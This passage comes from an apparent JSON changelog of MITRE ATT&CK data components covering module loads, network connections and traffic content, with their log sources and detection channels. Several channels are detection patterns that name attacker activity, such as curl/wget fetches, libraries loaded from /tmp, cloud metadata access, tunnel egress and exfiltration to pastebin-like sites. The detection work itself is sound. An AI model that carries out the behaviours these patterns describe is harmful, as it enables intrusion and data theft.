+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.773000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0073",
+                            "external_id": "DC0073"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Instance Modification",
+                    "description": "Changes made to a virtual machine (VM) or compute instance, including alterations to its configuration, metadata, attached policies, or operational state. Such modifications can include updating metadata, attaching or detaching resource policies, resizing instances, or modifying network configurations. Examples:\n\n- AWS: instance modifications include API actions like `ModifyInstanceAttribute`, `ModifyInstanceMetadataOptions`, or `RebootInstances`.\n- Azure: modifications can be tracked through operations like `Microsoft.Compute/virtualMachines/write`.\n- GCP: instance modification events include operations like `instances.setMetadata`, `instances.addResourcePolicies`, or `instances.resize`.\n\n*Data Collection Measures:*\n\n- AWS CloudTrail: Log Location: Stored in S3 or forwarded to CloudWatch.\n- Azure Activity Logs: Log Location: Accessible via Azure Monitor or exported to a storage account.\n- GCP Audit Logs: Log Location: Logs Explorer or BigQuery.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "RevertSnapshot"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "MICROSOFT.COMPUTE/VIRTUALMACHINES/RESTORE"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "compute.instances.restore"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ModifyInstanceAttribute"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-16 17:07:21.897000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0016",
+                            "external_id": "DC0016"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Module Load",
+                    "description": "When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Module",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=7"
+                        },
+                        {
+                            "name": "ETW:LoadImage",
+                            "channel": "provider: ETW LoadImage events for images from user-writable/UNC paths"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat/read/mmap: Open/mmap .so files from non-standard paths"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "select: Open files path LIKE '/tmp/%.so' OR '/dev/shm/%.so'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dyld/unified log entries indicating image load from non-system paths"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "select: path LIKE '%/Library/%/*.dylib' OR '/tmp/*.dylib'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dynamic loading of sleep-related functions or sandbox detection libraries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "LD_PRELOAD Logging"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Dynamic Linking State"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DYLD event subsystem"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Process linked with libcrypto.so making external connections"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events with dylib load activity"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=7"
+                        },
+                        {
+                            "name": "WinEventLog:Application",
+                            "channel": "CLR Assembly creation, loading, or modification logs via MSSQL CLR integration"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process memory maps new dylib (dylib_load event)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Dylib loaded from abnormal location"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=3033"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=3063"
+                        },
+                        {
+                            "name": "auditd:MMAP",
+                            "channel": "load: Loading of libzip.so, libz.so, or libbz2.so by processes not normally associated with archiving"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Loading of libz.dylib, libarchive.dylib by non-standard applications"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "suspicious dlopen/dlsym usage in non-development processes"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Non-standard Office startup component detected (e.g., unexpected DLL path)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mmap"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "unexpected module load"
+                        },
+                        {
+                            "name": "snmp:status",
+                            "channel": "Status change in cryptographic hardware modules (enabled -> disabled)"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "module load"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "delay/sleep library usage in user context"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kmod"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.kextd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loading of unexpected dylibs compared to historical baselines"
+                        },
+                        {
+                            "name": "auditd:file-events",
+                            "channel": "open of suspicious .so from non-standard paths"
+                        },
+                        {
+                            "name": "macos:syslog",
+                            "channel": "DYLD_INSERT_LIBRARIES anomalies"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "dmesg"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_KEXTLOAD"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "module load or memory map path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launch and dylib load"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Processes linked with libssl/libcrypto performing network activity"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-ImageLoad",
+                            "channel": "provider: Unsigned/user-writable image loads into msbuild.exe"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader load attempt from non-standard path or recently created file"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Short burst of file I/O followed by JNI/dlopen of a newly created .so"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "dyld: dlopen/dyld_cache load from non-standard app-writable path"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader/PathClassLoader loading from app-writable path OR reflective defineClass on byte[] payload"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "dlopen/image load from app-writable path (tmp, Caches) outside bundled resources"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "DexClassLoader|PathClassLoader load from app-writable path OR dlopen of a freshly created .so"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-01-29 17:21:27.873000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0016\", \"old_value\": \"https://attack.mitre.org/data-components/DC0016\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.770000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0082",
+                            "external_id": "DC0082"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Connection Creation",
+                    "description": "The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.\n\n*Data Collection Measures:*\n\n- Windows:\n    - Event ID 5156 \u2013 Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.\n- Linux/macOS:\n    - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.\n    - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.\n    - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.\n- Cloud & Network Infrastructure:\n    - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.\n    - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.\n- Endpoint Detection & Response (EDR):\n    - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "log entries indicating network connection initiation on macOS"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execs of chromium, google-chrome, firefox, libreoffice with http(s) in cmdline"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "connect/sendto"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open or connect syscalls on /tmp/ssh-* or $SSH_AUTH_SOCK"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect with TLS context by unexpected process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/bind: New bind() to a previously closed port shortly after the sequence."
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "sendto/connect"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "outbound connections"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/bind: Process binds to a new local port shortly after knock"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect calls showing SSH processes forwarding arbitrary ports"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat,connect -k discovery"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound connection to 169.254.169.254 from EC2 workload"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large transfer volume (>20MB) from RDS IP range to external public IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "High outbound traffic from new region resource"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound connections to port 22, 3389"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Traffic observed on mirror destination instance"
+                        },
+                        {
+                            "name": "cni:netflow",
+                            "channel": "outbound connection to internal or external APIs"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "socket connect"
+                        },
+                        {
+                            "name": "esxi:esxupdate",
+                            "channel": "/var/log/esxupdate.log or /var/log/vmksummary.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "System service interactions"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service initiated connections"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service-Based Network Connection"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "protocol egress"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network session initiation with external HTTPS services"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "family=AF_PACKET or protocol raw; process name not in allowlist."
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "network"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "postfix/smtpd"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "New Wi-Fi connection established or repeated association failures"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_CONNECT"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events/socket_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execution of trusted tools interacting with external endpoints"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd or network_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events + launchd"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "process_events, socket_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CONNECT: Long-lived connections from remote-control parents to external IPs/domains"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "connection attempts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "connection open"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network connection events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "First outbound connection from the same PID/user shortly after an inbound trigger."
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network sessions initiated by remote desktop apps"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Inbound connections to VNC/SSH ports"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Outbound Traffic"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "networkd or socket"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log stream network activity"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Association and authentication events including failures and new SSIDs"
+                        },
+                        {
+                            "name": "Network",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "networkdevice:Flow",
+                            "channel": "Traffic from mirrored interface to mirror target IP"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Dynamic route changes"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "web domain alerts"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "New outbound connection from Safari/Chrome/Firefox/Word"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connections from newly spawned child processes or from the browser to uncommon endpoints or on anomalous ports"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Outbound connection after script or installer launch"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound Connections"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "proxy or TLS inspection logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New TCP/443 or TCP/80 to domain not previously seen for the user/host"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connection to *.tunnels.api.visualstudio.com or *.devtunnels.ms"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections to *.devtunnels.ms or tunnels.api.visualstudio.com"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPs connection to tunnels.api.visualstudio.com"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound or inbound TFTP file transfers of ROMMON or firmware binaries"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: TCP connections to ports 139/445 to multiple hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: SMB connections to multiple internal hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound HTTP/S initiated by newly installed interpreter process"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound connections to RMM services or to unusual destination ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple failed connections (conn_state=REJ/S0 or history has 'R') across distinct ports from the same src_ip followed by success to a specific port."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sequence of REJ/S0 then SF success from same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Series of denied/closed flows to distinct ports then success to mgmt port from same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic spike through formerly blocked ports/subnets following config change"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress to Internet by the same UID/host shortly after terminal exec"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection: Inbound connections to SSH or VPN ports"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "External access to container ports (2375, 6443)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote access"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound Connections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection attempts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "High-volume or repeated SNMP GETBULK/GETNEXT queries from untrusted or external IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound connections from host during or immediately after image build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "new outbound connection from browser/office lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "new outbound connection from exploited lineage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple failed connections to closed ports (history contains 'R' or conn_state in {REJ, S0}) followed by a successful handshake to a new port from same src within TimeWindowKnock"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Closed-port hits followed by success from same src_ip"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Port-knock pattern from one src to device unicast,broadcast,network addresses on same port within TimeWindowKnock"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected inbound/outbound TFTP traffic for device image files"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected or unauthorized inbound connections to SNMP, NETCONF, or RESTCONF services"
+                        },
+                        {
+                            "name": "snmp:access",
+                            "channel": "GETBULK/GETNEXT requests for OIDs associated with configuration parameters"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Bits-Client/Operational",
+                            "channel": "BITS job lifecycle events such as job create/modify/transfer/complete and URL/remote name fields"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-WLAN-AutoConfig",
+                            "channel": "EventCode=8001, 8002, 8003"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=5156, 5157"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=3, 22"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=8001"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 18:37:33.992000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.771000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0085",
+                            "external_id": "DC0085"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Traffic Content",
+                    "description": "The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.\n\n*Data Collection Measures:*\n\n- Network Packet Capture (Full Content Logging)\n    - Wireshark / tcpdump / tshark\n        - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`\n    - Zeek (formerly Bro)\n        - Extracts protocol headers and payload details into structured logs. `echo \"redef Log::default_store = Log::ASCII;\" > local.zeek | zeek -Cr capture.pcap local.zeek`\n    - Suricata / Snort (IDS/IPS with PCAP Logging)\n        - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`\n- Host-Based Collection\n    - Sysmon Event ID 22 \u2013 DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated, Logs process-to-network connection relationships.\n    - AuditD (Linux) \u2013 syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`\n- Cloud & SaaS Traffic Collection\n    - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.\n    - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "ALB:HTTPLogs",
+                            "channel": "AWS ALB/ELB/GCP/Azure Application Gateway HTTP logs with unusual methods, long URIs, serialized payloads, 4xx/5xx bursts"
+                        },
+                        {
+                            "name": "apache:access_log",
+                            "channel": "Unusual HTTP POST or PUT requests to paths such as '/uploads/', '/admin/', or CMS plugin folders"
+                        },
+                        {
+                            "name": "API:ConfigRepoAudit",
+                            "channel": "Access to configuration repository endpoints, unusual enumeration requests or mass downloads"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setsockopt, ioctl modifying ARP entries"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Traffic between instances"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Large volume of malformed or synthetic payloads to application endpoints prior to failure"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Unusual volume of data transferred from S3 storage endpoints to non-corporate IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "High volume internal-to-internal IP transfer or cross-account cloud transfer"
+                        },
+                        {
+                            "name": "azure:activity",
+                            "channel": "networkInsightsLogs"
+                        },
+                        {
+                            "name": "azure:vpcflow",
+                            "channel": "HTTP requests to 169.254.169.254 or Azure Metadata endpoints"
+                        },
+                        {
+                            "name": "container:proxy",
+                            "channel": "outbound/inbound network activity from spawned pods"
+                        },
+                        {
+                            "name": "docker:events",
+                            "channel": "remote API calls to /containers/create or /containers/{id}/start"
+                        },
+                        {
+                            "name": "docker:stats",
+                            "channel": "unusual network TX/RX byte deltas"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "Process within container accesses link-local address 169.254.169.254"
+                        },
+                        {
+                            "name": "EDR:hunting",
+                            "channel": "Advanced Hunting: DeviceProcessEvents + DeviceNetworkEvents"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "Socket sessions with randomized payloads inconsistent with TLS"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "listening sockets bound to non-standard ports"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "listening sockets bound with non-standard encapsulated protocols"
+                        },
+                        {
+                            "name": "esxcli:network",
+                            "channel": "Socket inspection showing RSA key exchange outside baseline endpoints"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Network activity"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Outbound traffic using encoded payloads post-login"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS POST connections to webhook endpoints"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Inspection of sockets showing encrypted sessions from non-baseline processes"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "HTTPS POST connections to pastebin-like domains"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "network stack module logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Suspicious traffic filtered or redirected by VM networking stack"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMCI syslog entries"
+                        },
+                        {
+                            "name": "esxi:vob",
+                            "channel": "NFS/remote access logs"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-NDIS-PacketCapture",
+                            "channel": "TLS Handshake/Network Flow"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-WinINet",
+                            "channel": "HTTPS Inspection"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-WinINet",
+                            "channel": "WinINet API telemetry"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "network.query*"
+                        },
+                        {
+                            "name": "gcp:vpcflow",
+                            "channel": "first 5m egress to unknown ASNs"
+                        },
+                        {
+                            "name": "IDS:TLSInspection",
+                            "channel": "Malformed certs, incomplete asymmetric handshakes, or invalid CAs"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Query to suspicious domain with high entropy or low reputation"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "curl|wget|python .*http"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unexpected SQL or application log entries showing tampered or malformed data"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Integrity mismatch warnings or malformed packets detected"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "DNS response IPs followed by connections to non-standard calculated ports"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Multiple NXDOMAIN responses and high entropy domains"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "External HTTP/DNS connection from Office binary shortly after macro trigger"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process + network metrics correlation for bandwidth saturation"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "DNS query with pseudo-random subdomain patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "network flow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "curl|osascript.*open location"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem: com.apple.network"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "open URL|clicked link|LSQuarantineAttach"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Connections to suspicious domains with mismatched certificate or unusual patterns"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
